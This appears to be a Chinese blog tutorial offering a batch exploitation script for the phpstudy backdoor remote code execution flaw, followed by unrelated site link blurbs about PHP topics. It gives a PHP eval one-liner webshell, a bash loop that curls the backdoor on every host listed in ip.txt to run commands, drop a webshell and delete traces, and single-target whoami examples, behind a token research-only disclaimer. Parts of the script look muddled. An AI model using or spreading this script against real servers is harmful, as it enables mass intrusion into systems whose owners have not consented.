phpstudy后门rce批量利用脚本的实现

首先,需要说明一下,本文严禁用于非法操作,仅用于安全研究和提高意识。对于任何因为使用本文所述方法而带来的后果,本文作者不承担任何法律责任。

  1. 确定漏洞版本

在使用脚本前,需要先扫描网站是否存在phpstudy后门漏洞,并确定漏洞版本,常见的版本有:

  • phpstudy 2016版 v8.0
  • phpstudy 2018版 v8.0
  • phpstudy 2018版 v8.1
  • phpstudy 2018版 v8.2

  • 获取一句话木马或webshell

在确定了漏洞版本后,需要使用一句话木马或webshell来进行攻击。常见的一句话木马有:

  • php一句话木马
  • asp一句话木马
  • jsp一句话木马
  • perl一句话木马

此处以php一句话木马为例,如下:

<?php @eval($_POST['step']);?>

将木马文件上传至目标站点,获取文件路径。

  1. 编写批量利用脚本

接下来,需要编写批量利用脚本,实现对漏洞网站的批量攻击。脚本示意代码如下:

#!/bin/bash

#后门路径
phpstudy_path="/phpstudy/Home/page/www/"
#webshell地址
shell_url="http://ip:port/3trophp.php"
#后门执行命令
exec_cmd="php z5h.php"

#读取ip.txt文件中的url地址
for url in $(cat ./ip.txt)
do
    #执行后门,上传webshell
    curl "http://${url}/${phpstudy_path}z.php?id=${exec_cmd}"
    #获取webshell执行
    curl "http://${url}/z5h.php" --data "step=${exec_cmd}"
    #删除webshell文件
    curl "http://${url}/z5h.php" --data "step=unlink(/www/z5h.php)"
    #提示执行成功
    echo "${url} ok!"
done
  1. 批量利用漏洞

执行以上脚本即可实现对存活网站的批量攻击。举两个示例说明:

  • 示例1:使用以上脚本攻击ip.txt中列出的所有网站。
./phpstudy-rce.sh
  • 示例2:攻击单个网站,执行whoami命令。
curl "http://target.com:8081/phpstudy/Home/page/www/z.php?id=whoami"
curl "http://target.com:8081/z5h.php" --data "step=php z5h.php"

以上就是用于PHPStudy 后门RCE 批量利用脚本的实现攻略。

本站文章如无特殊说明,均为本站原创,如若转载,请注明出处:phpstudy后门rce批量利用脚本的实现 - Python技术站

(0)
上一篇 2023年5月27日
下一篇 2023年5月27日

相关文章

  • PHP实现权限管理功能示例

    下面是关于“PHP实现权限管理功能示例”的完整攻略,包括以下内容: 1. 需求分析 在实现权限管理系统之前,我们需要确定需求,明确应该具备哪些功能。例如: 用户的注册和登录 用户的角色以及角色的权限分配 对于不同权限的用户显示不同的内容 仅管理员才能进入后台管理页面 2. 数据库设计 在确定需要哪些功能后,我们需要设计数据库。例如: 用户表 字段 类型 描述…

    PHP 2023年5月24日
    00
  • php实现监听事件

    关于”PHP实现监听事件”的攻略,需要详细说明以下几点: 什么是监听事件? 在计算机编程中,事件是指程序中发生的一些特定的情况或行为。监听则是指在程序运行过程中,实时检测这些事件是否发生,并在事件发生时进行处理和响应。比如,当一个button按钮被点击时,程序就会监听到这个事件,并执行相应的代码。 如何实现监听事件? 在 PHP 中,我们可以通过 Regis…

    PHP 2023年5月27日
    00
  • PHP在弹框中获取foreach中遍历的id值并传递给地址栏

    当需要在PHP的弹框中获取Foreach循环所遍历的ID并传递给地址栏时,可以按照以下步骤进行操作: 步骤一:创建HTML页面 在HTML页面中创建一个链接,该链接将打开弹出窗口并传递Foreach循环中的ID。示例代码如下: <html> <head> <title>PHP弹框页面</title> <s…

    PHP 2023年5月27日
    00
  • 使用PHP开发Android应用程序技术介绍

    使用PHP开发Android应用程序,可以让我们充分发挥PHP在Web后端开发中的优势,通过网页服务实现Android应用程序的开发。 步骤一:准备工作 安装PHP环境、 Android SDK、 Android Studio; 创建Android项目,并在项目中添加PHP文件夹(用于存放PHP脚本的文件夹); 编写PHP脚本文件,用于实现与后端服务器的数据…

    PHP 2023年5月24日
    00
  • 如何在PHP中操作临时文件

    操作临时文件是在Web开发中常见的需求之一,PHP为我们提供了方便的操作临时文件的方式。下面我将详细讲解如何在PHP中操作临时文件。 创建临时文件 PHP中提供了tmpfile()函数用于创建一个临时文件并返回一个打开文件指针。该函数创建的临时文件只在脚本执行期间存在,当脚本结束时会自动删除。 // 创建临时文件 $temp = tmpfile(); // …

    PHP 2023年5月26日
    00
  • php修改数组键名的方法示例

    下面是关于“php修改数组键名的方法示例”的详细攻略: 一、什么是数组键名? 在PHP中,数组是一种可以用于存储一系列数据的数据结构。数组是由多个“元素”组成,每个元素都有一个对应的“键”和“值”。在数组中,键通常是一个字符串或数字,而值可以是任何类型的数据。 数组的键名是唯一的,这意味着不能有重复的键名。键名为数字的数组也可以称之为“索引数组”,而键名为字…

    PHP 2023年5月26日
    00
  • PHP strtotime函数详解

    PHP strtotime函数详解 什么是 strtotime 函数? PHP 中的 strtotime 函数可以将一个日期时间字符串转换为 Unix 时间戳。 函数语法 strtotime ( string $time [, int $now = time() ] ) : int $time:必需,待转换为 Unix 时间戳的时间字符串。 $now:可选,…

    PHP 2023年5月26日
    00
  • 微信小程序使用wx.request请求服务器json数据并渲染到页面操作示例

    下面是使用wx.request请求服务器JSON数据并渲染到页面的步骤: 1. 准备工作 在使用wx.request请求服务器JSON数据之前,需要先知道接口地址和返回的数据格式。若是自己开发的API,需要自己定义返回的数据格式;若是使用第三方API,则需要查看API的文档,了解返回的数据格式。 2. 发送请求 在小程序中调用wx.request函数发送请求…

    PHP 2023年5月23日
    00
合作推广
合作推广
分享本页
返回顶部